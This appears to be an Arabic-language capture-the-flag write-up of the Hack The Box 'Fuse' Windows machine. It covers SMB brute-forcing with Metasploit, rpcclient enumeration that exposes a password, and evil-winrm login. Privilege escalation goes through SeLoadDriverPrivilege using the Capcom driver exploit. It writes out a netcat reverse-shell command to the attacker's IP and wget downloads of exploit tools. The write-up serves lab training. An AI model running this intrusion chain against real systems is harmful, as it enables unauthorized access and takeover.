Posts Hackthebox fuse
Post
Cancel

Hackthebox fuse

Created by fasto

My profile : https://www.hackthebox.eu/home/users/profile/

Sammmry:

Desktop View

1
2
3
شيقة جدا نبدا بجمع machine هي fuse السلام عليكم اليوم ساقوم بشرح
للحصول على يوزر بعد ذلك نستغل brutforceمعلومات ثم نقوم ب
admininistratorلنحصل على صلاحيات seLoadDriver
  • 1.1 Nmap
  • 2 Port
    • 2.1 Fuse. fabricorp.local
  • 3 User
    • 3.1 brutforce
    • 3.2 Smbpasswd
    • 3.3 rpcclient
    • 3.4 User brutforce
  • 4 Privilege escalation
    • 4.1 SeLoadDriverPrivilege
    • 4.2 Compile
    • 4.3 exploit

Recon

1.1 Nmap

1
nmap نبدا بفحص البورتات باستخدام

Desktop View

2 Port

2.1 Fuse. fabricorp.local

نلاحظ وجود البورت 80 الخاص بالويب سيرفر مفتوح

1
2
3
fuse.fabricorp.local عند التصفح يقوم السيرفر بتحويلنا الى هذا الدومين 
/etc/hosts نضيف هذا الدومين في ملف
: ثم نقوم بفتحه على المتصفح

Desktop View

بعد ذلك نقوم بجمع المعلومات نجد بعض اليوزرس

Desktop View

1
2
 ثم نقوم بسحب كلمات من الدومين user.txt نضع هذه اليوزرس في ملف
باستخدام الامر التالي brutforceلاستعمالها في 

cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm

3 User

3.1 brutforce

Desktop View

1
2
msconsole نقوم بتشغيل الميتاسبلويت بالامر
: ثم
1
2
3
4
5
6
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.10.
set user_file user.txt
set pass_file wordlist
run

Desktop View

Desktop View

3.2 Smbpasswd

الان حصلنا على اسم مستخدم وكلمة سر لنقوم بتجريبها

1
2
3
4
smbclient -L fuse.htb -U tlavel
يخبرنا انه علينا تغير كلمة samabaعندما نحاول الاتصال ب
: السر نغير كلمة السر باستخدام الامر التالي
smbpasswd -r fuse.htb -U tlavel

Desktop View

3.3 rpcclient

#### : ثم نتصل باستخدام الامر التالي بكلمة السر الجديدة

rpcclient -U FABRICORP\tlavel 10.10.10.193

1
نسحب اليوزرس

rpcclient $> enumdomusers

1
نسحب كلمة المرور

rpcclient $> enumprinters

Desktop View

3.4 User brutforce

Desktop View

1
2
3
4
user.txtنضع اليوزرس في ملف
cut ثم نقوم بالتعديل عليه باستخدام
مرة اخرى بالميتاسبلويت brutforce ثم نقوم بعمل
وكلمة السر users.txt لملف

‫‪$fab@s3Rv1ce$1‬‬

Desktop View

الان وجدنا اليوزر و كلمة السر نقوم ب الدخول الى السيرفر

1
:بالامر التالي evil-winrm باستخدام

evil-winrm -u svc-print -p ‘$fab@s3Rv1ce$1’ -i fuse.htb

4 Privilege escalation

Desktop View

1
whoami /all نكتب الامر

4.1 SeLoadDriverPrivilege

“Load and unload device drivers” policy

SeLoadDriverPrivilege Load and unload device drivers Enabled

1
2
3
4
5
6
7
8
9
10
: بالبحث في جوجل نجد مقال جيد يتحدث عن الاستغلال
https://www.tarlogic.com/en/blog/abusing-
/seloaddriverprivilege-for-privilege-escalation
: من هنا eoploaddriver.cpp نقوم بتحميل
https://raw.githubusercontent.com/TarlogicSecurit
y/EoPLoadDriver/master/eoploaddriver.cpp
: من هنا ExploitCapcom.cpp و
https://github.com/tandasat/ExploitCapcom
visual studio ب compile نعمل لهم
:او يمكنك تحميل الملفات الخاصة بي من هنا

https://github.com/FASTO96/hackthebox/blob/master/Fuse/fuse.zip

4.2 Compile

1
exploitCapcom.cppل compile نقوم بعمل
1
2
الى مكان ا C:\\Windows\\system32\\cmd.exe مع تغير
c:\\temp\\fasto.bat الخاص بنا shell

Desktop View


Desktop View

1
: Fasto.bat

c:\temp\nc64.exe 10.10.14.212 1337 -e powershell.exe

1
الخاص بك ip غير 10.10.14.212 الى 

نقوم برفع الملفات على السيرفر

1
python serverاولا نشغل

Desktop View

1
2
3
c:\تحت temp  ثم ننشا مجلد باسم 

: لاوامرا wgetثم نقوم بالرفع في هذا المجلد باستخدام
1
2
3
4
5
6
wget http://10.10.14.212/Capcom.sys -O Capcom.sys
wget http://10.10.14.212/ExploitCapcom.exe -O ExploitCapcom.exe
wget http://10.10.14.212/fasto.bat -O fasto.bat
wget http://10.10.14.212/nc64.exe -O nc64.exe
wget http://10.10.14.212/Eoploaddriver.exe -O Eoploaddriver.exe

Desktop View

4.3 exploit

الان نقوم بالاستغلال

.\Eoploaddriver.exe System\CurrentControlSet\MyService C:\temp\capcom.sys .\ExploitCapcom.exe

Desktop View

Desktop View

Desktop View

This post is licensed under CC BY 4.0 by the author.

Trending Tags

Contents

Trending Tags